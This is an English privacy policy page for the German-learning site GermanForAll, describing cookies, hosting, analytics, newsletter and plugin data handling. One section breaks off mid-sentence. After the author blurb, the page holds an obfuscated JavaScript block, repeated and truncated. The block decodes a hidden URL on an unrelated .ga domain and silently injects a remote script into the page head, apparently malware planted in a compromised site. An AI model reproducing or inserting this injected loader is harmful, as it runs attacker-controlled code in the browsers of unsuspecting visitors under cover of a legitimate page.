Privacy Policy

This is a translation of our German privacy policy page. We make legally valid statements on data protection exclusively in our German version: https://germanforall.com/de/datenschutzerklarung/

vom 23.04.2019

On this page, you'll find all the information about what data we collect about our visitors and customers and how that data is used. We've described everything as clearly and concisely as possible and avoid legalese as much as possible, so that you can make sense of all this without needing a law degree.

We regularly review and, if necessary, update our privacy information. If we plan to use personal data for a new purpose, we update our privacy information and communicate the changes to individuals before starting any new processing.  

This is a privacy policy according to the valid German data protection regulation DSGVO for a German website, which serves the purpose of acquiring the German language and therefore is provided in other languages.

1. Privacy at a glance

General Information

The following notes give a simple overview of what happens to your personal information when you visit our website. Personal data is any data that personally identifies you. Detailed information on data protection can be found in this Privacy Policy.

What we are doing

GermanForAll provides suitable material for anyone who wants to learn the German language. These are mostly carefully written question-and-answer short stories that help the student significantly improve their language skills. The delivery of our offers is partly free of charge and partly for a fee.

Data collection on our website


Who is responsible for the data collection on this website?

The data processing on this website is done by the website operator whose contact details you can find at the imprint of this website.

How do we collect your data?

On the one hand, your data will be collected that you tell us. This may be e.g. to trade data that you enter in a contact form.

Other data is collected automatically when visiting the website through our IT systems. These are technical data (e.g., Internet browser, operating system or page view time). The collection of this information happens automatically as soon as you enter our website.

What do we use your data for?

A part of the data is collected to ensure the flawless functionality of the website. Other data can be used to analyze user behavior. 


What rights do you have regarding your data?

At any time you have the right to obtain free information about the origin, recipient, and purpose of your stored personal data. You also have a right to request the correction, blocking or deletion of this data. For this purpose as well as for further questions about data protection you can contact us at any time at the address given in the imprint. Furthermore, you have a right to appeal to the competent supervisory authority.

Analysis Tools and Third-Party Tools

When visiting our website, your surfing behavior can be statistically evaluated. This happens above all with cookies and with so-called analysis programs. The analysis of your surfing behavior is usually anonymous; the surfing behavior cannot be traced back to you. You can object to this analysis or prevent it by not using certain tools. Detailed information can be found in the following privacy policy.

You can contradict to this analysis. We will inform you about the possibilities of contradictory ways in this privacy policy.

2. General Information and Mandatory Information

Data Protection

The operators of these pages take the protection of your personal data very seriously. We treat your personal data confidentially and in accordance with the statutory data protection regulations and this privacy policy.

If you use this website, various personal data will be collected. Personal information is information that personally identifies you. This Privacy Policy explains what information we collect and what we use it for. It also explains how and for what purpose this happens.

Please note that data transmission over the Internet (for example, when communicating by e-mail) may have security vulnerabilities. A complete protection of the data from access by third parties is not possible.

Note to the Responsible Body

The responsible data processing company on this website is:

Cathrin Kilian
8345 NW 66 ST # D4222
MIAMI, FL 33166-2696

Telephone: +49 178 4023594 (No Support)
E-mail: cathrinkilian@gmail.com

Responsible body is the natural or legal person who, alone or in concert with others, decides on the purposes and means of processing personal data (such as names, e-mail addresses, etc.).

Revocation of Your Consent to Data Processing

Many data processing operations are only possible with your express consent. You can revoke an already given consent at any time. An informal message by e-mail to us is sufficient. The legality of the data processing carried out until the revocation remains unaffected by the revocation.

Right of Appeal to the Competent Supervisory Authority

In the case of violations of data protection law, the person concerned has the right to appeal to the competent supervisory authority. The competent supervisory authority in matters of data protection law is the state data protection officer of the federal state in which our company is based. A list of data protection officers and their contact details can be found on the following link: https://www.bfdi.bund.de/DE/Infothek/Anschriften_Links/anschriften_linksnode.html.

Right to Data Portability

You have the right to have data that we process on the basis of your consent or in fulfillment of a contract automatically, in itself or to a third party in a standard, machine-readable format. If you require the direct transfer of the data to another person in charge, this will only be done to the extent technically feasible.

Encrypted Payments on This Website

If, after the conclusion of a fee-based contract, there is an obligation to provide us with your payment details (eg account number for direct debit authorization), this data will be required for payment processing.

Payment transactions via the common means of payment (Visa / MasterCard, direct debit) are made exclusively via an encrypted SSL or TLS connection. An encrypted connection is indicated by the browser's address bar changing from "http: //" to "https: //" and the lock icon in your browser bar.

In the case of encrypted communication, your payment details that you send to us cannot be read by third parties.

Information, Blocking, Deletion

Within the scope of the applicable legal provisions, you have the right at any time to provide free information about your stored personal data, their origin, and recipient and the purpose of the data processing and, if necessary, a right to correct, block or delete this data. For further information on personal data, please contact us at any time at the address given in the imprint.

Contradiction Against Advertising Mails

The use of our in the context of the imprint obligation contact published information for sending unsolicited advertising and information materials is hereby prohibited. The operators of the pages expressly reserve the right to take legal action in the event of the unsolicited sending of advertising information, such as spam e-mails.

3. Data collection on our website

Cookies

Similar to other commercial Web sites, our Web site utilizes a standard technology called "cookies" (see explanation below, "What Are Cookies?") and Web server logs to collect information about how our Web site is used. Information gathered through cookies and Web server logs may include the date and time of visits, the pages viewed, time spent at our Web site, and the Web sites visited just before and just after our Web site, your IP address.

Cookies do not harm your computer and do not contain viruses. Cookies are used to make our offer more user-friendly, effective and secure. Cookies are small text files that are stored on your computer and stored by your browser.

Most of the cookies we use are so-called "session cookies". They are automatically deleted after your visit. Other cookies remain stored on your device until you delete them. These cookies allow us to recognize your browser on your next visit.

You can set your browser so that you are informed about the setting of cookies and allow cookies only in individual cases, the acceptance of cookies for certain cases or generally exclude and the automatic deletion activate the cookies when closing the browser. Disabling cookies may limit the functionality of this website.

Cookies are used to carry out the electronic communication process to provide certain of desired functions (for example, shopping cart function) are determined on the basis of Article 6 (1) lit. f DSGVO saved. The website operator has a legitimate interest in the storage of cookies for the technically correct and optimized provision of its services. If other cookies (such as cookies for analyzing your browsing behavior) are stored, they will be treated separately in this privacy policy.

IP Addresses

IP addresses are used by your computer every time you are connected to the Internet. Your IP address is a number that is used by computers on the network to identify your computer. IP addresses are automatically collected by our web server as part of demographic and profile data known as “traffic data” so that data (such as the Web pages you request) can be sent to you.

Webhosting and Server Log Files

I use the GoSuccess GmbH, Alte Holstenstr. 16, D-21031 Hamburg, for webhosting for this website and for this purpose I have concluded a Data-Processing-Agreement pursuant to Art. 28 DSGVO with GoSuccess. The provision of the contractually agreed data processing takes place exclusively in a member state of the European Union or in another contracting state to the Agreement on the European Economic Area (EEA). The legal basis is our legitimate interest in the operation and maintenance of the reliability of these websites in accordance with Art. 6 para. 1 sentence 1 lit. f DSGVO. Statement from GoSuccess: https://gosuccess.co/datenschutz

The provider of the pages automatically collects and stores information in so-called server log files, which your browser automatically transmits to us. These are:

Browser type and browser version
used operating system
Referrer URL
Host name of the accessing computer
Time of the server request
IP address

There is no merge of this data with other data sources.

Contact Form

If you want to contact us, please use our contact form. https://germanforall.com/contact

If you send us inquiries via the contact form, your details from the inquiry form, including the contact details you provided there, will be stored in order to process the request and in case of follow-up questions. We will not share this information without your consent.

The processing of the data entered into the contact form takes place exclusively on the basis of your consent (Art. 6 (1) lit. DSGVO). You can revoke this consent at any time. An informal message by e-mail to us is sufficient. The legality of the data processing operations carried out until the revocation remains unaffected by the revocation.

The information you provide in the contact form will remain with us until you ask us to delete it, revoke your consent to storage, or delete the purpose for data storage (for example, after your request has been processed). Mandatory statutory provisions - especially retention periods - remain unaffected.

Comments on this website

In addition to your comment, the comment function on this page will also contain information about when the comment was created, your e-mail address and, if you do not post anonymously, the username you selected.

If users leave comments or other contributions, their IP addresses based on our legitimate interests within the meaning of Art. 6 para. 1 lit. f. DSGVO be stored for 7 days. This is for our own safety, if someone leaves illegal content in comments and contributions (insults, prohibited political propaganda, etc.). In this case, we may be sued for the comment or post and are therefore interested in the identity of the author.

Furthermore, we reserve the right, in accordance with our legitimate interests. Art. 6 para. 1 lit. f. DSGVO to process the information of users for the purpose of spam detection.

On the same legal basis, we reserve the right, in the case of surveys, to store the IP addresses of users for the duration of their use and to use cookies to avoid multiple votes.

The data provided in the comments and contributions are stored by us permanently until the users object.

Subscribe to comments

As a user of the site, you can subscribe to comments after registering. You will receive a confirmation email to verify that you are the owner of the given email address. You can unsubscribe from this function at any time via a link in the info mails.

Thrive Themes

On this website we use several ThriveThemes plugins. ThriveThemes does not process and store any data of our users / customers. ThriveThemes plugins store cookies in such a way that no personal information is stored (no additional consent required), detailed information can be found here: https://thrivethemes.com/tkb_item/what-cookies-do-the-thrive-products- use-and-why /

ThriveThemes Privacy Policy: https://thrivethemes.com/privacy-policy

We use the Thrive Quiz Builder to offer quizzes. This plugin has a profiling option (to choose whether or not to associate certain answers with specific user data). That is, if we only receive aggregated data, we do not need additional approval. If we use the profiling option, we will inform you about it before you start a quiz (by default, we have disabled this feature).

Registration on This Website

You can register on our website to use additional features on the site. We only use the data entered for the purpose of using the respective offer or service for which you have registered. The mandatory information requested during registration must be given in full. Otherwise we will reject the registration.

For important changes such as the scope of supply or for technically necessary changes, we use the at the registered e-mail address to inform you in this way.

The processing of the data entered during registration takes place on the basis of your consent (Art. 6 (1) lit. DSGVO). You can revoke your consent at any time. An informal message by e-mail to us is sufficient. The legality of the already completed data processing remains unaffected by the revocation.

The data collected during registration will be stored by us as long as you are registered on our website and will subsequently be deleted. Legal retention periods remain unaffected.

Digimember und Digistore24

Instead of registering directly onision an

4. Social Media

Share content via Shariff Wrapper

https://de.wordpress.org/plugins/shariff/

The original parts buttons automatically send information about their own visitors to the social networks. It is not necessary that they actively click on one of the buttons, but this happens when the page is called in the background. Users have no choice whether to send information to Facebook and Co. or not. The German computer magazine c't has therefore developed "Shariff" (ʃɛɹɪf), with which privacy-compliant parts buttons can be integrated that meet the requirements of the General Data Protection Regulation (DSGVO - Directive (EU) 2016/679). This plugin implements the Shariff concept in an easy-to-use form for WordPress. At the moment it supports 32 services: AddThis, Bitcoin, Diaspora, Facebook, Flattr, Flipboard, GooglePlus, LinkedIn, mailto, Mastodon, Odnoklassniki, Patreon, PayPal, PayPal.me, Pinterest, Pocket, Printer, Qzone, Reddit, RSS, SMS , Stumbleupon, Telegram, TencentWeibo, Threema, Tumblr, Twitter, VK, Wallabag, Weibo, WhatsApp, Xing.

More information about the Shariff project can be found in the original Github project or on the information page of the c't magazine.

The part buttons can be automatically added to posts, pages, the blog page, product pages, and more with this plugin. It is also possible to integrate them in pages and in the theme using a widget or manually with the help of the shortcode.

The data transfer depends on whether you have an account with the plug-in provider and are logged in there. If you are logged in to the plug-in provider, your data collected from us will be directly associated with your existing account with the plug-in provider.

For more information on the purpose and scope of your data collection and processing through social media services, please refer to the privacy statements of these providers provided below. There you will also get more information about your rights and settings options for the protection of your privacy.

Addresses of the respective social media services and URL with their privacy notices:

Facebook Inc., 1601 S California Ave, Palo Alto, California 94304, USA; http://www.facebook.com/policy.php; further information about the data collection: http://www.facebook.com/help/186325668085084, http://www.facebook.com/about/privacy/your-info-on-other#applications sowie http://www.facebook.com/about/privacy/your-info#everyoneinfo. Facebook has submitted to the EU-US Privacy Shield, https://www.privacyshield.gov/EU-US-Framework.

Google Inc., 1600 Amphitheater Parkway, Mountainview, California 94043, USA; https://www.google.com/policies/privacy/partners/?hl=de. Google has submitted to the EU-US Privacy Shield, https://www.privacyshield.gov/EU-US-Framework.

Twitter, Inc., 1355 Market St, Suite 900, San Francisco, California 94103, USA; https://twitter.com/privacy. Twitter has submitted to the EU-US Privacy Shield, https://www.privacyshield.gov/EU-US-Framework.

Xing AG, Gänsemarkt 43, 20354 Hamburg, DE; http://www.xing.com/privacy.

T3N, yeebase media GmbH, Kriegerstr. 40, 30161 Hannover, Deutschland; https://t3n.de/store/page/datenschutz

LinkedIn Corporation, 2029 Stierlin Court, Mountain View, California 94043, USA; http://www.linkedin.com/legal/privacy-policy. LinkedIn has submitted to the EU-US Privacy Shield, https://www.privacyshield.gov/EU-US-Framework.

Flattr Network Ltd. mit Sitz in 2 nd Floor, White bear yard 114A, Clerkenwell Road, London, Middlesex, England, EC1R 5DF, Großbritannien; https://flattr. com/privacy.]

5. Analysis Tools and Advertising

Google Analytics

This website uses functions of the web analytics service Google Analytics. Provider is the Google Ireland Limited, Gordon House, Barrow Street, Dublin 4, Ireland

Google Analytics uses so-called "cookies". These are text files that are stored on your computer and that allow an analysis of the use of the website by you. The information generated by the cookie about your Use of this website is usually transmitted to and stored on a Google server in the United States.

Google Analytics cookies are stored on the basis of Art. 6 para. 1 lit. f DSGVO. The website operator has a legitimate interest in analyzing user behavior in order to optimize both its website and its advertising.

IP anonymization

We have activated the function IP anonymization on this website. This will result in your IP address being shortened by Google within member states of the European Union or other parties to the Agreement on the European Economic Area prior to transmission to the United States. Only in exceptional cases will the full IP address be sent to a Google server in the US and shortened there. Google will provide this information on behalf of the operator of this website to evaluate your use of the website, to compile reports on website activity, and to provide other services related to website activity and internet usage to the website operator. The IP address provided by Google Analytics as part of Google Analytics will not be merged with other Google information.

Browser plugin

You can prevent the storage of cookies by a corresponding setting of your browser software; however, we point out that in this case you may not be able to use all the functions of this website in full. In addition, you may prevent the collection by Google of the data generated by the cookie and related to your use of the website (including your IP address) as well as the processing of this data by Google by downloading the browser plug-in available under the following link and install: https://tools.google.com/dlpage/gaoptout?hl=de.

Opposition to data collection

You can prevent the collection of your data by Google Analytics by clicking on the following link. An opt-out cookie will be set to prevent your data from being collected on future visits to this site: 

​For more information on how to handle user data on Google Analytics, please see the Google Privacy Policy:
https://support.google.com/analytics/answer/6004245?hl=de.

Order processing

We have entered into an agreement with Google for order data processing and fully implement the strict requirements of the German data protection authorities when using Google Analytics.

Demographic features in Google Analytics

This website uses the demographics feature of Google Analytics. As a result, reports can be produced that contain information on the age, gender and interests of the site visitors. These data are from interest-based advertising from Google and from third-party visitor data. This data can not be assigned to a specific person. You can disable this feature at any time through the ad settings in your Google Account, or generally prohibit the collection of your data by Google Analytics as described in the section "Opposition to data collection".

Google Analytics Remarketing

Our websites leverage the features of Google Analytics Remarketing with the cross-device capabilities of Google AdWords and DoubleClick. Provider is the Google Ireland Limited, Gordon House, Barrow Street, Dublin 4, Ireland

This feature allows you to associate the advertising audiences created with Google Analytics Remarketing with the cross-device capabilities of Google AdWords and Google DoubleClick. In this way, interest-based, personalized advertising messages adapted to you depending on your previous usage and browsing behavior on one end device (e.g., cell phone) are also displayed on another of your end devices (e.g., tablet or PC).

Once you have given your consent, Google will associate your web and app browsing history for this purpose Your Google Account. That way, the same personalized advertising messages can appear on any device you sign in to with your Google Account.

To support this feature, Google Analytics collects Google-authenticated IDs of users who are temporarily linked to our Google Analytics data to define and create audiences for cross-device ad promotion.

You can permanently opt out of cross-device remarketing / targeting by disabling personalized ads in your Google Account; follow this link:
https://www.google.com/settings/ads/onweb/.

The aggregation of the data collected in your Google Account will be solely based on your consent, which is You can submit or revoke it on Google (Article 6 (1) (a) GDPR). For data collection operations that are not merged into your Google Account (for example, because you do not have a Google Account or have objected to the merge), the collection of data is based on Art. 6 (1) lit. f DSGVO. The legitimate interest arises from the fact that the website operator has an interest in the anonymous analysis of website visitors for advertising purposes.

For more information and privacy policy, see the Google Privacy Policy at: https://www.google.com/policies/technologies/ads/.

Google AdWords and Google Conversion Tracking

This website uses Google AdWords. AdWords is an online advertising program of Google Inc., Google Ireland Limited, Gordon House, Barrow Street, Dublin 4, Ireland

As part of Google AdWords, we use the so-called conversion tracking. When you click on an ad served by Google, a conversion tracking cookie is set. Cookies are small text files that the Internet browser stores on the user's computer. These cookies lose their validity after 30 days and are not used for the personal identification of the users. If the user visits certain pages on this website and the cookie has not expired yet, Google and we may recognize that the user has clicked on the ad and has been redirected to this page.

Each Google AdWords customer receives a different cookie. The cookies can not be tracked through the websites of advertisers. The information gathered using the conversion cookie is used to generate conversion statistics for AdWords advertisers who have opted for conversion tracking. The customers learn the total number of People who clicked on their ad and were redirected to a conversion tracking tag page. However, they do not receive any information that personally identifies users. If you do not want to participate in tracking, you can opt-out of this by easily disabling the Google Conversion Tracking cookie through its Internet browser under User Preferences. You will not be included in the conversion tracking statistics.

The storage of "conversion cookies" is based on Art. 6 para. 1 lit. f DSGVO. The website operator has one legitimate interest in the analysis of user behavior in order to optimize both its website and its advertising.

For more information about Google AdWords and Google Conversion Tracking, see the Google Privacy Policy: https://www.google.de/policies/privacy/.

You can set your browser so that you are informed about the setting of cookies and cookies only in individual cases permit, exclude the acceptance of cookies for certain cases or in general, as well as activate the automatic deletion of cookies when closing the browser. Disabling cookies may limit the functionality of this website.

Google reCAPTCHA

We use "Google reCAPTCHA" (hereafter "reCAPTCHA") on our websites. Provider is the Google Ireland Limited, Gordon House, Barrow Street, Dublin 4, Ireland

With reCAPTCHA should
We check whether the data entry on our websites (for example in a contact form) is done by a human or by an automated program. To do this, reCAPTCHA analyzes the behavior of the website visitor based on various characteristics. This analysis begins automatically as soon as the website visitor enters the website. For analysis, reCAPTCHA evaluates various information (e.g., IP address, website visitor's visit time on the user's mouse movement website). The data collected during the analysis will be forwarded to Google.

The reCAPTCHA analyzes are completely in the background. Site visitors are not advised that an analysis is taking place.

Data processing is based on Art. 6 para. 1 lit. f DSGVO. The Web site operator has a legitimate interest in protecting its web sites from abusive automated spying and SPAM.

For more information about Google reCAPTCHA and Google's privacy policy, please see the following links:https://www.google.com/intl/de/policies/privacy/ and https://www.google.com/recaptcha/intro/android.html.

6. Newsletter

Newsletter Data

If you wish to receive the newsletter offered on the website, we require an e-mail address from you, as well as information that allows us to verify that you are the owner of the e-mail address provided and that you agree to receive the newsletter , Further data are not collected or only on a voluntary basis. We use this data exclusively for the delivery of the requested information and do not pass it on to third parties.

The processing of the data entered into the newsletter registration form takes place exclusively on the basis of your consent (Art. 6 (1) lit. DSGVO). You can revoke your consent to the storage of data, the e-mail address and its use for sending the newsletter at any time, for example via the "unsubscribe" link in the newsletter. The legality of the already completed data processing operations remains unaffected by the revocation.

The data deposited with us for the purpose of obtaining the newsletter will be stored by us from the newsletter until your subscription and deleted after cancellation of the newsletter. Data that has been stored for other purposes with us (such as e-mail addresses for the members area) remain unaffected.

Newsletter - shipping service ActiveCampaign

On my website you can subscribe to an e-mail newsletter in several places. I process only the specified e-mail address and possibly the given first name, which is optional. The e-mail address is mandatory in order to send you the newsletter and thus to be able to provide my services.

You can unsubscribe from the newsletter at any time. A link to the deregistration can be found in every e-mail. Alternatively, you can of course contact me at any time if you want to unsubscribe from the newsletter.

To be able to analyze the popularity of my newsletter and to optimize it, we log when emails are opened and links are clicked. This usage analysis is based on a balance of interests. You can object to this processing at any time by unsubscribing from the newsletter.

As a technical service provider, I use ActiveCampaign for this. Entering data for the purpose of newsletter subscription is stored on the servers of ActiveCampaign, Chicago, USA.

ActiveCampaign is certified under the EU-US Privacy Shield. The Privacy Shield is an agreement between the European Union (EU) and the US to ensure compliance with European privacy standards in the United States.
https://www.privacyshield.gov/participant?id=a2zt0000000GnH6AAK&status=Active

Data processing is based on your consent (Article 6 (1) (a) GDPR). The data deposited with us for the purpose of obtaining the newsletter will be saved by us from the newsletter until your cancellation and will be deleted from our servers as well as from the servers of ActiveCampaign after cancellation of the newsletter. Data that has been stored for other purposes with us (such as e-mail addresses for the members area) remain unaffected.

For more information about ActiveCampaign's privacy policy, please visit: https://www.activecampaign.com/privacy-policy/

Completion of a data processing agreement

We have a so-called "Data Processing Agreement" with Active Campaign, in which we commit ActiveCampaign to protect the data of our customers and not to pass them on to third parties. This contract can be viewed at the following link:

https://help.activecampaign.com/attachments/token/uwR3MAvkLs1CbfZX7o2pL2HtH/?name=ActiveCampaign+-+Data+Processing+Addendum+-+031918+%281%29.pdf

7. Plugins and Tools

YouTube

Our website uses plugins from the Google-powered YouTube page. Site operator is YouTube, Google Ireland Limited, Gordon House, Barrow Street, Dublin 4, Ireland

If you visit any of our YouTube plug-in-enabled sites, you will be connected to the servers of YouTube. It tells the YouTube server which of our pages you've visited.

If you are logged in to your YouTube account, YouTube will allow you to associate your browsing behavior directly with your personal profile. You can prevent this by logging out of your YouTube account.

The use of YouTube is in the interest of an attractive presentation of our online offers. This constitutes a legitimate interest within the meaning of Art. 6 para. 1 lit. f DSGVO.

For more information about how to handle user data, please refer to the YouTube Privacy Policy at: https://www.google.de/intl/de/policies/privacy.

Google Web Fonts

This site uses so-called web fonts provided by Google for the uniform representation of fonts. When you call up a page, your browser loads the required web fonts into your browser cache to correctly display texts and fonts.

To do this, the browser you use must connect to Google's servers. As a result, Google learns that our website has been accessed via your IP address. The use of Google Web Fonts is in the interest of a consistent and attractive presentation of our online services. This constitutes a legitimate interest within the meaning of Art. 6 para. 1 lit. f DSGVO.

We use the plugin Remove Google Fonts References to ensure the anonymization of your data.

If your browser does not support web fonts, a default font will be used by your computer.

For more information about Google Web Fonts, see https://developers.google.com/fonts/faq and in Google's privacy policy: https://www.google.com/policies/privacy/.

SoundCloud

On our pages plugins of the social network SoundCloud (SoundCloud Limited, Berners House, 47-48 Berners Street, London W1T 3NF, United Kingdom.) May be integrated. The SoundCloud plugins can be recognized by the SoundCloud logo on the affected pages.

When you visit our pages, a direct connection is established between your browser and the SoundCloud server after activation of the plugin. SoundCloud receives the information that you have visited our site with your IP address. If you click the "Like" or "Share" button while logged into your SoundCloud account, you may link and / or share the content of our pages with your SoundCloud profile. This will allow SoundCloud to associate your account with our pages. We point out that we as the provider of the pages are not aware of the content of the transmitted data and their use by SoundCloud. For more information, see the Privacy Statement of SoundCloud: https://soundcloud.com/pages/privacy.

If you do not want SoundCloud to associate the visit to our pages with your SoundCloud account, please log out of your SoundCloud account before enabling content from the SoundCloud plug-in.

8. Privacy Policy: Summary

  • We don't sell your data to any company for further processing, marketing, profiling or any other reason
  • We integrate with certain third party services for the purpose of improving the overall user experience and to optimize certain business processes.
  • Any data we hold about you, we do so for necessary and legitimate business reasons.
  • You can request to view, modify and delete any data that we hold about you.

9. Policy Changes

We reserve the right to amend this privacy policy at any time with or without notice. However, please be assured that if the Privacy Policy changes in the future, we will not use the personal information you have submitted to us under this Privacy Policy in a manner that is materially inconsistent with this Privacy Policy, without your prior consent.

We are committed to conducting our business in accordance with these principles in order to ensure that the confidentiality of personal information is protected and maintained.

If you have any concerns or questions about anything in this policy, then let us know and we'll get back to you shortly.

>
cathrinkilian

Hi, I'm Cathi, a Native German.

Subscribe to get FREE Mini-Stories and 7 Keys of Success Language Acquisition.

var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var 